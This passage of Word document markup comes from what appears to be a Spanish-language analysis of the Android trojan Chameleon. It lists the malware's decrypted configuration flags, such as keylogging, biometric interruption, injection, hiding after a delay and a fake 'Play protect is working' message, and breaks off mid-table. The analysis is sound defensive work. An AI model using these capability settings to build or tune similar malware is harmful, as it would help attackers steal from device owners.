          <v:shape id="Picture 40" o:spid="_x0000_s2056" type="#_x0000_t75" alt="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:6.15pt;width:513.65pt;height:346.4pt;z-index:23;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2" o:title="A screenshot of a computer&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;&#13;&#13;&#13;&#13;&#13;&#13;&#13;&#10;Description automatically generated"/>
            <w10:wrap type="topAndBottom" anchorx="margin"/>
          </v:shape>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="396048F2" w14:textId="01E87321" w:rsidR="00943AD6" w:rsidRDefault="00943AD6" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Como se muestra en el diagrama, los valores finales obtenidos tras aplicar el algoritmo de desencriptación son legibles </w:t>
      </w:r>
      <w:r w:rsidR="008C4DBB">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y proporcionan posibles indicaciones respecto a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la naturaleza de los comandos y ajustes locales con los que cuenta Chameleon.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46ADA133" w14:textId="3B9E1AD1" w:rsidR="000A24A3" w:rsidRDefault="00943AD6" w:rsidP="00310F9F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Una vez comprobado que el algoritmo generado funciona correctamente, se puede </w:t>
      </w:r>
      <w:r w:rsidR="00C14655">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>aplicar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> a </w:t>
      </w:r>
      <w:r w:rsidR="00C14655">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">todos </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">los </w:t>
      </w:r>
      <w:r w:rsidR="000A24A3">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ajustes </w:t>
      </w:r>
      <w:r w:rsidR="00366A89">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">iniciales obtenidos a partir del fichero </w:t>
      </w:r>
      <w:r w:rsidR="005C7E07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>obtenido a partir</w:t>
      </w:r>
      <w:r w:rsidR="00366A89">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de </w:t>
      </w:r>
      <w:r w:rsidR="005C7E07">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>la ejecución inicial del malware durante la fase de análisis dinámico</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, obteniendo la siguiente lista de ajustes junto con sus valores </w:t>
      </w:r>
      <w:r w:rsidR="00B75F02">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>iniciales</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18AD41AA" w14:textId="77777777" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90" w:rsidP="00310F9F">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01"/>
        <w:gridCol w:w="4502"/>
      </w:tblGrid>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="52F3428D" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E101923" w14:textId="705751EC" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Nombre del ajuste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AA1241D" w14:textId="3C9AF4C6" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:bCs/>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Valor</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="5CD4A122" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="594D0924" w14:textId="6E3E0EBE" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>launch_time</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B6495D2" w14:textId="212F342A" w:rsidR="00EC0DBD" w:rsidRDefault="005C1815">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>1717806586</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="67C709A2" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64367B54" w14:textId="14218AB6" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>self_defense</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19262786" w14:textId="4A9B8D2C" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="726D3835" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="59C97067" w14:textId="7EB0B2C8" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>is_keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1FEA167B" w14:textId="2E4CBC46" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="63ED555C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63124D0D" w14:textId="428DF950" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>auto_delete</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5022D90B" w14:textId="0CD002E0" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="3F8F4533" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="22F08683" w14:textId="26DDF5D4" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>push_write</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00650C23" w14:textId="22C6A094" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="3DD55978" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="765E8EFD" w14:textId="63331203" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>auto_click</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="24A089DB" w14:textId="4B571955" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="46023F8C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3CD6324D" w14:textId="001960B0" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0054886C" w14:textId="1483E82C" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>web</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="1E8871E8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="517B673C" w14:textId="65080F9A" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>annoy</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="063446B0" w14:textId="0BC95F90" w:rsidR="00EC0DBD" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="36218281" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B9BB8B4" w14:textId="657DB991" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>intercept_cookies</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="700976DA" w14:textId="47836C28" w:rsidR="00EC0DBD" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="7DD451EC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6916B219" w14:textId="04DB05FC" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>interrupt_biometric</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="26BB6311" w14:textId="3629995C" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="6686BC48" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5E1831D4" w14:textId="75DEB999" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>first_launch</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="613C6F4D" w14:textId="45E2842C" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="20D9615C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="43D0C48E" w14:textId="0B9AE973" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>hide_after_delay</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3B1146E4" w14:textId="7868B9DD" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="6CDD07BC" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="73D42C76" w14:textId="28948267" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>injection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2DBAA873" w14:textId="33A69116" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="771679D8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="42938F0A" w14:textId="54A1F76A" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>text</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="31E3468E" w14:textId="13A9707D" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>Play protect is working</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="3FCA3540" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="64DC14EC" w14:textId="5B002413" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>android_13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6A1B9905" w14:textId="647431B5" w:rsidR="00EC0DBD" w:rsidRDefault="00EC0DBD">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>true</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC0DBD" w14:paraId="799C1827" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="555CF34B" w14:textId="2BADA0DD" w:rsidR="00EC0DBD" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>service_cham</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4502" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EE64C0" w14:textId="038C2A1C" w:rsidR="00EC0DBD" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:lang w:val="es-ES"/>
              </w:rPr>
              <w:t>false</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00EC3C90" w14:paraId="6442DD6A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4501" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19AD5944" w14:textId="6B750908" w:rsidR="00EC3C90" w:rsidRDefault="00EC3C90">
            <w:pPr>
              <w:spacing w:line="360" w:lineRule="auto"/>
              <w:jc w:val="both"/>
